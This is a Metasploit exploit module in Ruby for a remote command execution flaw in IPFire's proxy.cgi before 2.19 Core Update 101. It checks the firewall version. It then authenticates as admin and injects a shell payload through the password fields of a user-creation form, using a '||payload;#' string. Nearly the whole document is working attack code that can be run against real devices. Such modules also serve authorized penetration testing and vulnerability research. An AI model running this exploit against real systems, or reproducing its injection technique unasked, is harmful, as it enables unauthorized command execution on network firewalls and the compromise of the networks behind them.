## ## This module requires Metasploit: http://metasploit.com/download ## Current source: https://github.com/rapid7/metasploit-framework ### require 'msf/core' class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' => 'IPFire proxy.cgi RCE', 'Description' => %q( IPFire, a free linux based open source firewall distribution, version < 2.19 Update Core 101 contains a remote command execution vulnerability in the proxy.cgi page. ), 'Author' => [ 'h00die ', # module 'Yann CAM' # discovery ], 'References' => [ [ 'EDB', '39765' ], [ 'URL', 'www.ipfire.org/news/ipfire-2-19-core-update-101-released'] ], 'License' => MSF_LICENSE, 'Platform' => 'unix', 'Privileged' => false, 'DefaultOptions' => { 'SSL' => true }, 'Arch' => [ ARCH_CMD ], 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'perl awk openssl' } }, 'Targets' => [ [ 'Automatic Target', {}] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'May 04 2016' ) ) register_options( [ OptString.new('USERNAME', [ true, 'User to login with', 'admin']), OptString.new('PASSWORD', [ false, 'Password to login with', '']), Opt::RPORT(444) ], self.class ) end def check begin res = send_request_cgi( 'uri' => '/cgi-bin/pakfire.cgi', 'method' => 'GET' ) fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200 /\IPFire (?[\d.]{4}) \([\w]+\) - Core Update (?[\d]+)/ =~ res.body if version && update && version == "2.19" && update.to_i < 101 Exploit::CheckCode::Appears else Exploit::CheckCode::Safe end rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") end end def exploit begin # To manually view the vuln page, click to proxy.cgi. At the bottom # select Local, and save. Ignore the error box, at the bottom of # the page click the button: User Management. payload_formatted = "||#{payload.encoded};#" post_data = "NCSA_USERNAME=#{Rex::Text.rand_text_alpha(10)}" post_data << "&NCSA_GROUP=standard" post_data << "&NCSA_PASS=#{Rex::Text.uri_encode(payload_formatted)}" post_data << "&NCSA_PASS_CONFIRM=#{Rex::Text.uri_encode(payload_formatted)}" post_data << "&SUBMIT=Create+user" post_data << "&ACTION=Add" post_data << "&NCSA_MIN_PASS_LEN=6" res = send_request_cgi( 'uri' => '/cgi-bin/proxy.cgi', 'method' => 'POST', 'ctype' => 'application/x-www-form-urlencoded', 'headers' => { 'Referer' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/proxy.cgi" }, 'data' => post_data ) # success means we hang our session, and wont get back a response if res fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200 end rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") end end end